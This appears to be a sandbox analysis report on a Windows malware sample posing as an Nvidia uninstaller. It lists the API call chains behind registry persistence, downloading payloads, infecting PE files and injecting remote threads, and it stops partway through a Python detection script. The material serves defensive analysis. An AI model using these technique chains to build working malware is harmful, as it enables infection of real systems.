API calls 3 library calls 25362->25418 25364 403f80 25419 40c15a 105 API calls 5 library calls 25364->25419 25366 403f86 25366->25354 25367->25190 25368->25194 25369->25196 25370->25198 25371->25200 25372->25202 25373->25204 25374->25206 25375->25208 25376->25210 25377->25212 25378->25214 25379->25216 25380->25218 25381->25220 25382->25222 25383->25224 25384->25227 25385->25229 25386->25231 25387->25233 25388->25235 25389->25240 25390->25242 25391->25245 25392->25247 25393->25249 25394->25251 25395->25253 25396->25255 25397->25257 25398->25261 25399->25265 25400->25267 25401->25269 25402->25271 25403->25273 25404->25275 25405->25277 25406->25279 25407->25283 25408->25287 25409->25298 25410->25298 25411->25290 25412->25294 25413->25351 25414->25353 25415->25356 25416->25356 25417->25362 25418->25364 
25419->25366 25420->25164 25422 40c790 type_info::_Type_info_dtor 25421->25422 25440 411a2d 66 API calls 2 library calls 25422->25440 25424 40c797 25425 40c816 _abort 25424->25425 25427 40c7bb 25424->25427 25445 40c851 LeaveCriticalSection __freefls@4 25425->25445 25441 40ed78 66 API calls __output_l 25427->25441 25428 40c832 25430 40c84e type_info::_Type_info_dtor 25428->25430 25446 411955 LeaveCriticalSection 25428->25446 25430->25029 25431 40c7c6 25442 40ed78 66 API calls __output_l 25431->25442 25434 40c845 25447 40c620 25434->25447 25436 40c806 _abort 25436->25425 25437 40c7d4 25437->25436 25443 40ed6f 66 API calls __initp_misc_cfltcvt_tab 25437->25443 25444 40ed78 66 API calls __output_l 25437->25444 25440->25424 25441->25431 25442->25437 25443->25437 25444->25437 25445->25428 25446->25434 25450 40c5fa GetModuleHandleA 25447->25450 25451 40c609 GetProcAddress 25450->25451 25452 40c61f ExitProcess 25450->25452 25451->25452 25453 40c619 25451->25453 25453->25452 25938 4031f0 191 API calls 25939 4069f0 185 API calls _memset 25973 40aef0 194 API calls 26003 4017f0 172 API calls 26004 408ff0 191 API calls 3 library calls 25974 40c6f3 74 API calls 4 library calls 25940 41adf7 CloseHandle CloseHandle 25975 22fd099 11 API calls 25941 22ff794 Sleep 25942 404580 175 API calls 25976 408a80 210 API calls 3 library calls 26005 402b80 187 API calls 25909 409889 186 API calls 3 library calls 25978 416a8c SetUnhandledExceptionFilter 25912 402490 177 API calls __fcloseall 25913 408c90 199 API calls 25943 401990 176 API calls _memset 25944 409590 213 API calls 25979 401e90 181 API calls ___crtsetenv 26006 404f90 194 API calls setSBUpLow 25509 2302de6 25530 23078a0 25509->25530 25512 2302e2d 25532 2302847 25512->25532 25515 2302e53 CreateThread FindCloseChangeNotification CreateThread 25516 2302e95 CreateThread FindCloseChangeNotification CreateThread FindCloseChangeNotification 25515->25516 25641 2302633 25515->25641 25660 22fb3f5 25515->25660 25555 2303090 CreateFileMappingA 
25516->25555 25626 22fb81a 25516->25626 25633 22f3f98 Sleep 25516->25633 25520 2303014 CreateThread 25523 2303035 CreateThread 25520->25523 25686 22f3846 25520->25686 25521 2302f1d 25521->25520 25573 22fbd79 25521->25573 25524 2303056 25523->25524 25674 22f3d56 25523->25674 25526 230306c 25524->25526 25527 230305f Sleep 25524->25527 25525 2303930 6 API calls 25528 2303009 25525->25528 25527->25524 25528->25520 25529 2302f62 25529->25525 25531 2302e08 SetErrorMode 25530->25531 25531->25512 25533 2302871 25532->25533 25577 2301d03 RegOpenKeyExA 25533->25577 25536 2302952 LoadLibraryA 25537 23029d1 RegOpenKeyExA 25536->25537 25545 230296e 25536->25545 25538 23029f5 RegSetValueExA RegCloseKey 25537->25538 25539 2302a2d RegOpenKeyExA 25537->25539 25538->25539 25540 2302a51 RegSetValueExA 25539->25540 25541 2302a89 RegOpenKeyExA 25539->25541 25540->25541 25542 2302b19 GetComputerNameA 25541->25542 25549 2302aad 25541->25549 25544 2302b44 CreateFileMappingA 25542->25544 25543 2302908 25543->25536 25547 2302bb8 25544->25547 25545->25537 25588 22f1b6e 25547->25588 25549->25542 25550 2302bc2 25552 2302bd9 CharLowerA GlobalAlloc 25550->25552 25601 22fba5a 25550->25601 25554 2302d93 CreateThread 25552->25554 25554->25515 25667 230161b GlobalAlloc 25554->25667 25556 2302f09 25555->25556 25557 23030dc MapViewOfFile 25555->25557 25558 2303930 25556->25558 25557->25556 25559 23039eb 25558->25559 25560 23039df 25558->25560 25559->25521 25560->25559 25561 2303a02 GetUserNameA 25560->25561 25562 2303a2b 25561->25562 25563 2303a54 RegOpenKeyExA 25562->25563 25564 2303a7f 25563->25564 25564->25559 25565 2303ac4 RegEnumValueA 25564->25565 25568 2303ca9 25564->25568 25570 2303b2d 25565->25570 25567 2303b91 25567->25559 25569 2303e67 RegCloseKey 25567->25569 25568->25567 25571 2303d4f RegQueryValueExA 25568->25571 25569->25559 25570->25567 25572 2303c5e RegSetValueExA 25570->25572 25571->25567 25572->25570 25574 22fbdbd 25573->25574 25576 22fbde6 25573->25576 25575 22fbdc6 MapViewOfFile 
25574->25575 25574->25576 25575->25576 25576->25529 25578 2301d54 RegSetValueExA RegCloseKey 25577->25578 25579 2301d8b 25577->25579 25578->25579 25606 2301c79 RegOpenKeyExA 25579->25606 25582 2301c79 4 API calls 25584 2301dbc 25582->25584 25583 2301c79 4 API calls 25583->25584 25584->25583 25585 2301e07 25584->25585 25586 2301e77 WinExec LoadLibraryA 25585->25586 25587 2301c79 4 API calls 25585->25587 25586->25536 25586->25543 25587->25585 25589 22f1b98 25588->25589 25590 22f1c23 GetUserNameA 25589->25590 25600 22f1c05 25589->25600 25591 22f1c4c 25590->25591 25592 22f1cab RegOpenKeyExA 25591->25592 25593 22f1cd6 RegCreateKeyA 25592->25593 25592->25600 25594 22f1cff 25593->25594 25593->25600 25595 22fbd79 MapViewOfFile 25594->25595 25596 22f1d1e 25595->25596 25599 22f1d37 25596->25599 25611 22f226c 25596->25611 25598 22f1f18 GlobalFree 25598->25600 25599->25598 25599->25600 25600->25550 25602 22fbaa6 GetPrivateProfileStringA 25601->25602 25604 22fbadf 25602->25604 25603 22fbb67 25603->25552 25604->25603 25605 22fbb42 WritePrivateProfileStringA 25604->25605 25605->25603 25607 2301ca3 RegSetValueExA 25606->25607 25608 2301cc7 RegCreateKeyA 25606->25608 25610 2301cc5 25607->25610 25609 2301cdd RegSetValueExA 25608->25609 25608->25610 25609->25610 25610->25582 25612 22f2279 25611->25612 25613 22f2336 25612->25613 25615 22f1869 25612->25615 25613->25599 25616 22f1876 25615->25616 25617 22f197d RegOpenKeyExA 25616->25617 25620 22f18de 25616->25620 25618 22f19a4 25617->25618 25619 22f1b40 RegCloseKey 25618->25619 25618->25620 25623 22f19ee 25618->25623 25619->25620 25620->25613 25621 22f1b0e RegSetValueExA 25624 22f1b3b 25621->25624 25622 22f1aeb RegSetValueExA 25622->25624 25623->25621 25623->25622 25624->25613 25632 22fb892 25626->25632 25627 22fba49 25628 22fb917 FindFirstFileA 25629 22fb941 FindNextFileA 25628->25629 25628->25632 25629->25632 25630 22fba13 Sleep 25630->25629 25632->25627 25632->25628 25632->25630 25693 22fb79d 16 API calls 25632->25693 25694 22f12c4 
25633->25694 25636 22f42cc 25637 22f406f 25637->25636 25696 22ff805 25637->25696 25712 22ffea5 CreateFileA 25637->25712 25719 2300281 17 API calls 25637->25719 25642 2302640 25641->25642 25643 2302684 LoadLibraryA 25642->25643 25644 2302677 Sleep 25642->25644 25646 23026b3 GetProcAddress 25643->25646 25652 23026cb CreateThread 25643->25652 25644->25642 25646->25652 25648 2302749 CreateThread 25649 230276a 25648->25649 25743 2300d09 Sleep 25648->25743 25650 23027a4 CreateThread FindCloseChangeNotification 25649->25650 25651 23027cc 25649->25651 25653 2302781 Sleep 25650->25653 25739 2300b90 25650->25739 25720 2300640 16 API calls 25651->25720 25652->25648 25723 2301e7c 25652->25723 25653->25649 25655 23027e1 25721 2300640 16 API calls 25655->25721 25657 2302833 25658 23027ee 25658->25657 25722 2300992 27 API calls 25658->25722 25661 22fb42b Sleep 25660->25661 25662 22fb438 25660->25662 25661->25662 25811 22fa364 RegOpenKeyExA 25662->25811 25665 22fa364 5 API calls 25666 22fb475 25665->25666 25668 22fbd79 MapViewOfFile 25667->25668 25669 230166f 25668->25669 25670 230168c GlobalFree 25669->25670 25671 23016cc 25670->25671 25673 23016aa 25670->25673 25673->25671 25819 230135e 25673->25819 25675 2303090 2 API calls 25674->25675 25676 22f3db7 25675->25676 25677 2303930 6 API calls 25676->25677 25678 22f3dcb 25677->25678 25847 22f3c90 25678->25847 25680 22f3dd0 Sleep 25683 22f3ddb 25680->25683 25681 22f3eee 25682 22f3e32 CreateThread FindCloseChangeNotification Sleep 25682->25683 25850 22f3a74 25682->25850 25683->25681 25683->25682 25684 2303930 6 API calls 25683->25684 25685 22f3c90 2 API calls 25683->25685 25684->25683 25685->25683 25687 22f3853 25686->25687 25688 22f390e socket 25687->25688 25689 22f393f setsockopt bind 25688->25689 25691 22f393a 25688->25691 25689->25691 25692 22f3988 25689->25692 25690 22f3995 recvfrom 25690->25692 25692->25690 25692->25691 25693->25632 25695 22f12e8 Sleep 25694->25695 25695->25637 25697 22ff882 25696->25697 25698 22ffa7c 
Control-flow graph edge list for the unpacked code region at 022F0000 (node/edge pairs omitted). The node labels name the WinINet download loop (InternetOpenA, InternetOpenUrlA, InternetReadFile, WriteFile, InternetCloseHandle), a file rewrite routine (GlobalAlloc, ReadFile, SetFilePointer, WriteFile, SetEndOfFile, DeleteFileA), the file infection routine (GetFileAttributesA, SetFileAttributesA, CreateFileA, CreateFileMappingA, MapViewOfFile, SetFilePointer, SetEndOfFile, SetFileTime), a directory walk (FindFirstFileA, FindNextFileA, FindClose, Sleep), recursive registry deletion (RegEnumValueA, RegDeleteValueA, RegEnumKeyExA, RegDeleteKeyA), token adjustment and remote-thread injection (LookupPrivilegeValueA, AdjustTokenPrivileges, GetTokenInformation, lstrcmpiA, CreateMutexA, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread), UDP traffic (socket, sendto, select), registry writes and reads (RegSetValueExA, RegQueryValueExA, RegCloseKey) and WideCharToMultiByte. The per-function listings that follow give the exact call sites.

Control-flow Graph: function 00403260 to 00403A24 (executed/not-executed colouring and edge list omitted; node labels show calls to GetModuleHandleA, GetProcAddress, GetCurrentProcess, MessageBoxA, GetWindowsDirectoryA, GetSystemDirectoryA, GetCurrentDirectoryA, SHGetFolderPathA, PathAppendA, SHGetSpecialFolderPathA, GetUserDefaultLangID, GetModuleFileNameA, GetComputerNameA, GetUserNameA and GetVersionExA plus CRT helpers; full list under APIs below)
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040329C
                                  • GetProcAddress.KERNEL32(00000000), ref: 004032A3
                                  • GetCurrentProcess.KERNEL32(?), ref: 004032BA
                                  • _sprintf.LIBCMT ref: 004032DF
                                  • MessageBoxA.USER32(?,?,Fatal Error,00000010), ref: 004032F7
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004035D0
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004035F7
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00403647
                                  • _memset.LIBCMT ref: 00403676
                                  • SHGetFolderPathA.SHELL32(00000000,00008023,00000000,00000000,?), ref: 00403694
                                  • PathAppendA.SHLWAPI(?,NVIDIA), ref: 004036A7
                                  • SHGetFolderPathA.SHELL32(00000000,00008023,00000000,00000000,?), ref: 004036D1
                                  • SHGetSpecialFolderPathA.SHELL32(?,?,00000017,00000000), ref: 004036FD
                                  • SHGetSpecialFolderPathA.SHELL32(?,?,00000019,00000000), ref: 0040371F
                                  • _getenv.LIBCMT ref: 0040373A
                                  • _getenv.LIBCMT ref: 00403754
                                  • SHGetSpecialFolderPathA.SHELL32(?,?,00000026,00000000), ref: 00403775
                                  • GetUserDefaultLangID.KERNEL32 ref: 0040378B
                                  • _sprintf.LIBCMT ref: 004037A5
                                  • _sprintf.LIBCMT ref: 004037D5
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                    • Part of subcall function 00401C90: _sprintf.LIBCMT ref: 00401D29
                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00403816
                                  • GetComputerNameA.KERNEL32 ref: 00403872
                                  • GetUserNameA.ADVAPI32(?,?), ref: 00403899
                                  • GetVersionExA.KERNEL32(?,?,?,?,?,?), ref: 004038C0
                                  • _sprintf.LIBCMT ref: 004038D8
                                    • Part of subcall function 0040C051: __flsbuf.LIBCMT ref: 0040C0BF
                                  • _sprintf.LIBCMT ref: 00403906
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Path_sprintf$Folder$DirectoryNameSpecial$CurrentModuleTimeUser_fputs_getenv$AddressAppendComputerDebugDefaultFileFormatHandleLangLocalMessageMutexObjectOutputProcProcessReleaseSingleStringSystemVersionWaitWindows__flsbuf__output_l_fprintf_memset
                                  • String ID: 0PB$A dir will be applied to the given path and for each file found it sets variable {current file} to that file and calls the given command.$ALLUSERSPROFILE$ALLUSERSPROFILEDir$Allows waiting for a specific registry key or value to be deleted$Call$Command$Command Name$CommandClass::CommandClass$Computer Name$Control\Class$Current Parser Name$Current Parser Path$Currentdir$Data$Defines the variable if not defined and Sets the its value to the given value.If [=Value] is not given it undefines the given variable$DirAndApply$DirPath,Command $DriverBaseRegPath$Echo$Eval$Exact path to App + arguments$Executes all the commands in that file and returns$Executes command if Exp1 is the same as Exp2 for = or Exp1 has Exp2 for % if ! is added to the beging of Exp1 it will negate the result$Executes the given system command (returns immidiately)$Fatal Error$Filename$Help$I386$If <Command Name> is provided displayes syntax and description of that command otherwise displays all the avilable commands$IsWow64Process$Language Resource$Language Resource %d$NVIDIA$Name[=Value] $OS Major Version$OS Minor Version$Opens the given log files ad Logs all the commands in the given file$Outputs data after evaluation$Path to an NVU File$Platform$Primary Language Resource$ProgramFilesDir$Run$Run all the commands in this file and delete the file$RunOnce$Section Name$Services\Class$Set$Shows the given bitmap for the given time number on the screen$Sleep$Splash$StartLogging$StopLogging$Stops logging close the file$SysCallAndWait$System$USERPROFILE$USERPROFILEDir$Unknown WIN32 NT5$Unknown WIN32 Windows$User Name$WaitOnRegDel$Waits for a number of miliseconds passed before executing the next command$Win2K$Win7$Win95$Win98$WinME$WinNT4$WinServer2003Family$WinVista$WinXP$You are running a 32 bit version of Nvidia uninstaller on a 64 bit system (Binary type %s).Wrong version of uninstaller. 
Uninstaller exits now.$[!]Exp1}[=%]{Exp2} then {Command$call and wait untill app is done.$commondesktop$commonprograms$kernel32$milisconds$milisconds}, {BitmapPath$pgmdir$reEvaluates the given command and executes it$runs all the commands in that section and returnd and continues executing commands after that line$sysdir$syswow64dir$windir$wrkdir${Key,Value,LoopDelay,MaxLoopCount,TimeoutCommand
                                  • API String ID: 3787303011-104186289
                                  • Opcode ID: c7b1109d8d7fe42fc13c850b3191039402dc4bd9570320ae813f2569530abb39
                                  • Instruction ID: 5e0c39b89a0a37415d1c05462954512994c9776a5e82db3148113b3a6bc72530
                                  • Opcode Fuzzy Hash: c7b1109d8d7fe42fc13c850b3191039402dc4bd9570320ae813f2569530abb39
                                  • Instruction Fuzzy Hash: E502A3713C4344AFC620AF508C96FFE7698AB84745F10443FB94AB61D1DBBC99888B9D

Control-flow Graph: function 0047C11B to 0047C360 (executed/not-executed colouring and edge list omitted; node labels show LoadLibraryA, SetErrorMode, two CreateFileMappingA calls, MapViewOfFile, CreateThread, Sleep, GetModuleFileNameA, LoadLibraryA, GetProcAddress, CreateMutexA, GetLastError, Sleep and ExitProcess; full list under APIs below)
                                  APIs
                                  • LoadLibraryA.KERNELBASE(KERNEL32.DLL), ref: 0047C1D9
                                    • Part of subcall function 0047C36A: GetProcAddress.KERNELBASE(75550000,CloseHandle), ref: 0047C374
                                  • SetErrorMode.KERNEL32(00008002), ref: 0047C200
                                  • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,l8geqpHJTkdns0), ref: 0047C21A
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_90830), ref: 0047C234
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0047C24A
                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,0047C796), ref: 0047C298
                                  • Sleep.KERNEL32(0000000C), ref: 0047C2B3
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LisectAVT_2403002B_38.exe,000001FE,75550000,LoadLibraryA), ref: 0047C2DD
                                  • LoadLibraryA.KERNELBASE(SHELL32.DLL), ref: 0047C2F8
                                  • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0047C306
                                  • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0047C333
                                  • GetLastError.KERNEL32(00000000), ref: 0047C33A
                                  • Sleep.KERNEL32(000927C0), ref: 0047C349
                                  • ExitProcess.KERNEL32(00000000), ref: 0047C351
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateFile$AddressErrorLibraryLoadMappingProcSleep$ExitLastModeModuleMutexNameProcessThreadView
                                  • String ID: """"$3333$Ap1mutx7$C:\Users\user\Desktop\LisectAVT_2403002B_38.exe$GetProcAddress$KERNEL32.DLL$LoadLibraryA$SHELL32.DLL$ShellExecuteA$l8geqpHJTkdns0$open$purity_control_90830
                                  • API String ID: 496405446-4165867204
                                  • Opcode ID: c63a345c9f1db3f00a854740f14354582dd33e4d8cc0bff97de8b0f78c264116
                                  • Instruction ID: 98630bb871ff8f82f1be8d53fa777d51ab6f49751e6c0cdc5617d2350871ea1c
                                  • Opcode Fuzzy Hash: c63a345c9f1db3f00a854740f14354582dd33e4d8cc0bff97de8b0f78c264116
                                  • Instruction Fuzzy Hash: CD517170640288ABDF10DFA0CC88FD93769EF44B05F54856AEE0DBE1B1C67556408B1E
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?), ref: 022FCE9C
                                  • SetFileAttributesA.KERNEL32(?,00000020), ref: 022FCEAB
                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 022FCED7
                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,027E7000,00000000), ref: 022FCF68
                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 022FCF90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
• Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate$MappingView
                                  • String ID: $($<$PE$`$d$d$d$h*U
                                  • API String ID: 1961427682-4248685410
                                  • Opcode ID: ea33ed159c2f696c64356d913cb0dfe59a19a15a463c009ba6876bce969a8140
                                  • Instruction ID: 9942e1a06d6ac1687226467567146d072835b339b885f0d64b0e2f9c2f45c8bb
                                  • Opcode Fuzzy Hash: ea33ed159c2f696c64356d913cb0dfe59a19a15a463c009ba6876bce969a8140
                                  • Instruction Fuzzy Hash: 0B438CB1D102299BDB64CF94CD94BEEB3B6FB48304F0481E9D20DA7285DB35AA85CF54

Control-flow Graph: function 02300D40 to 0230135D (executed/not-executed colouring and edge list omitted; node labels show LookupPrivilegeValueA, AdjustTokenPrivileges, GetTokenInformation, lstrcmpiA, CreateMutexA, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread and FindCloseChangeNotification; the APIs entry below records only the FindCloseChangeNotification call site)
                                  APIs
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 02301305
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
• Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID: P
                                  • API String ID: 2591292051-3110715001
                                  • Opcode ID: d7d3b9d1a789c558d900b5ca93480853ac344cddb0975a5b9200eae160cc999c
                                  • Instruction ID: f25bbb02c04c0cd3a4f9d2fa38c0aa71418dfd6b4b1a3e638131740a40191ae7
                                  • Opcode Fuzzy Hash: d7d3b9d1a789c558d900b5ca93480853ac344cddb0975a5b9200eae160cc999c
                                  • Instruction Fuzzy Hash: F0F161B5E40218EBEB24CFA4CC98BEE777CFB08714F104698E659A61C0D7B45A95CF60

Control-flow Graph: function 022FFA87 to 022FFEA4 (executed/not-executed colouring and edge list omitted; node labels show Sleep, FindFirstFileA, FindNextFileA, FindClose and calls into 022FA201, 022FB79D and 022FCAC1, with a recursive call back into 022FFA87; no API call sites were recorded for this function)
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
• Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Find$FileSleep$CloseFirstNext
                                  • String ID: P$c:\windows
                                  • API String ID: 2763178097-2351311205
                                  • Opcode ID: c047d3c1a8fb74fb9d68208ae84786d014997aac57a902be1c99a03e7330c710
                                  • Instruction ID: 736e2666bd7a7fbf79d5f4f1cef738f23ebd55105febc9c0dbe685100b606e67
                                  • Opcode Fuzzy Hash: c047d3c1a8fb74fb9d68208ae84786d014997aac57a902be1c99a03e7330c710
                                  • Instruction Fuzzy Hash: B0C1BEB1A50209ABCB14CFA8DD94BAF77B9EF48308F048568FA09DB285D734D961CF54

Control-flow Graph: function 022FF805 to 022FFA86 (executed/not-executed colouring and edge list omitted; node labels show InternetOpenA, InternetOpenUrlA, CreateFileA, InternetReadFile, WriteFile, FindCloseChangeNotification and two InternetCloseHandle calls; full list under APIs below)
                                  APIs
                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 022FF905
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 022FF937
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 022FF96C
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 022FF992
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 022FF9DA
                                  • FindCloseChangeNotification.KERNEL32(?), ref: 022FFA4A
                                  • InternetCloseHandle.WININET(?), ref: 022FFA60
                                  • InternetCloseHandle.WININET(?), ref: 022FFA76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
• Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Internet$CloseFile$HandleOpen$ChangeCreateFindNotificationReadWrite
                                  • String ID:
                                  • API String ID: 2209595824-0
                                  • Opcode ID: c832760ac960677d959a5c8f765e5f6df1a1a647925e3251d7e1e0bd81497286
                                  • Instruction ID: 28a81ef1b1079e88ee5b9dbedcac9524cc0da7eee8143dfd31f038e698297ff0
                                  • Opcode Fuzzy Hash: c832760ac960677d959a5c8f765e5f6df1a1a647925e3251d7e1e0bd81497286
                                  • Instruction Fuzzy Hash: 5661A1B194061CEBDB70CB54CD58FEAB779AB48305F0046E5E609A62D4CBB85BD4CFA0
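The API chains recorded above (the loader stub at 0047C11B with its named section objects and mutex, the WinINet download-to-disk loop at 022FF805, the VirtualAllocEx/WriteProcessMemory/CreateRemoteThread chain at 02300D40 and the file-mapping infection routine at 022FCAC1) are what a responder wants to recognise in any call trace, not only in this one. The Python below is an added example, not code from this report or from Joe Sandbox: it parses lines in the report's "APIs" format, pulls out the named kernel objects the sample creates, and matches ordered API chains against a call sequence. The two excerpt strings are copied from the listings above; the injection and infection traces are constructed from control-flow node labels and marked as such in the code; the pattern names, argument positions and helper functions are this example's own assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# One report "APIs" line: optional bullet, optional "Part of subcall function XXXX:" prefix,
# Api.MODULE, optional "(args)", then "ref: <hex address>".
API_LINE = re.compile(
    r"^\s*\u2022?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Copied from this report: the loader stub at 0047C11B and the download loop at 022FF805
# (raw strings, because the sample path contains backslashes).
LOADER_EXCERPT = r"""LoadLibraryA.KERNELBASE(KERNEL32.DLL), ref: 0047C1D9
  Part of subcall function 0047C36A: GetProcAddress.KERNELBASE(75550000,CloseHandle), ref: 0047C374
SetErrorMode.KERNEL32(00008002), ref: 0047C200
CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,l8geqpHJTkdns0), ref: 0047C21A
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_90830), ref: 0047C234
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 0047C24A
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,0047C796), ref: 0047C298
Sleep.KERNEL32(0000000C), ref: 0047C2B3
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LisectAVT_2403002B_38.exe,000001FE,75550000,LoadLibraryA), ref: 0047C2DD
LoadLibraryA.KERNELBASE(SHELL32.DLL), ref: 0047C2F8
GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 0047C306
CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0047C333
GetLastError.KERNEL32(00000000), ref: 0047C33A
Sleep.KERNEL32(000927C0), ref: 0047C349
ExitProcess.KERNEL32(00000000), ref: 0047C351"""
DOWNLOADER_EXCERPT = r"""InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 022FF905
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 022FF937
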